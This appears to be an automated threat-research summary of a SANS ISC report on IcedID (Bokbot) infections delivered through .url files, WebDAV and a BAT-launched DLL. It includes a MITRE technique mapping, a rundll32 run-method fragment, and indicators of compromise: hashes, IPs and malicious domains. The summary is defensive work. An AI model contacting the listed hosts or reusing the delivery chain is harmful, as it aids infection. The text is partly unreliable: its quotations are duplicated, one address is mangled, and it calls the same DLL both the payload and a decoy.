Threat Research

URL files and WebDAV used for IcedID (Bokbot) infection

Securonix

An ISC SANS diary documents an IcedID (Bokbot) infection that uses .url and WebDAV to fetch and run its payload, including a 64-bit DLL retrieved from mandalorecnote.com. The report catalogs the WebDAV activity, the payload delivery chain, and the IOCs and infrastructure observed in this wave. #IcedID #Bokbot #WebDAV #mandalorecnote #PO61467

Keypoints

  • IcedID is delivered via .url files that contact a WebDAV server and trigger a BAT file that loads the installer DLL.
  • The infection uses WebDAV traffic (PROPFIND and GET) to retrieve components from a remote server and execute the payload.
  • WebDAV activity is accompanied by a follow-on GET to mandalorecnote.com/images that returns a decoy 64-bit DLL, likely for distraction or signaling this wave.
  • Observed IOCs include a large set of .url files (VirusTotal), specific SHA-256 hashes, and multiple domains/IPs used for C2 or decoy traffic.
  • Post-compromise activity includes persistent DLLs loaded via rundll32.exe and the use of gzip-binary downloads from Ituitem.net.
  • Final IOCs list includes WebDAV host at 104.156.149.6, C2 domains such as renomesolar.com, palasedelareforma.com, and noosaerty.com.

MITRE Techniques

  • [T1566.001] Phishing – The article notes “For email-based distribution, we’ve seen OneNote files as an initial lure this month (here’s one example).” – “For email-based distribution, we’ve seen OneNote files as an initial lure this month (here’s one example).”
  • [T1189] Drive-by Compromise – The malware is “delivered by fake software sites from Google ad traffic.” – “delivered by fake software sites from Google ad traffic.”
  • [T1059.003] Windows Command Shell – The BAT file “runs a DLL installer for IcedID on the same server at 104.156.149[.]6webdavhost.dll.” – “The .bat file runs a DLL installer for IcedID on the same server at 104.156.149[.]6webdavhost.dll.”
  • [T1071.001] Web Protocols – WebDAV activity generated several HTTP PROPFIND and GET requests. – “This WebDAV activity generated several HTTP PROPFIND and GET requests.”
  • [T1105] Ingress Tool Transfer – The “.url” and “.bat” files both use WebDAV to retrieve and run the malware. – “The .url and .bat files both use WebDAV to retrieve and run the malware.”
  • [T1218.011] Signed Binary Proxy Execution: Rundll32 – Run method: rundll32.exe [filename],XSSCheckStart. – “Run method: rundll32.exe [filename],XSSCheckStart.”

Indicators of Compromise

  • [URL] Infections indicators – 22 .url files found on VirusTotal contacting the malicious WebDAV server – PO#56034.url, PO#15986.url, and 20 more URLs
  • [SHA256] File hashes – 0a79166f95d1f1a3542135241ea42026188916ea9c06510c20247849c5ad6f0e, 0dfd67dafe621b57eac338e581d65598197cdb0a499a8345fa9beeae9196d8e8
  • [SHA256] File hashes – 2bdc4b5aa6b3f9395065f2c31ba130ecc21fbe4db3fcdb3c60a526e34e72bd74, 2c814c61891a1b3b9067b82b5357d13505b4ced6fd827fdde4c3116efb3f9cef
  • [IP] WebDAV server – 104.156.149.6; another observed host for C2-like traffic – 5.61.47.8
  • [Domain] C2/DECoy domains – mandalorecnote.com, ituitem.net
  • [Domain] Additional infrastructure – renomesolar.com, palasedelareforma.com, noosaerty.com
  • [File name] PO#61467.url; PO_61467.bat – files observed as part of the delivery chain
  • [File] host.dll, host.dll.manifest – DLLs retrieved and used in the infection flow

Read more: https://isc.sans.edu/diary/URL+files+and+WebDAV+used+for+IcedID+Bokbot+infection/29578/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint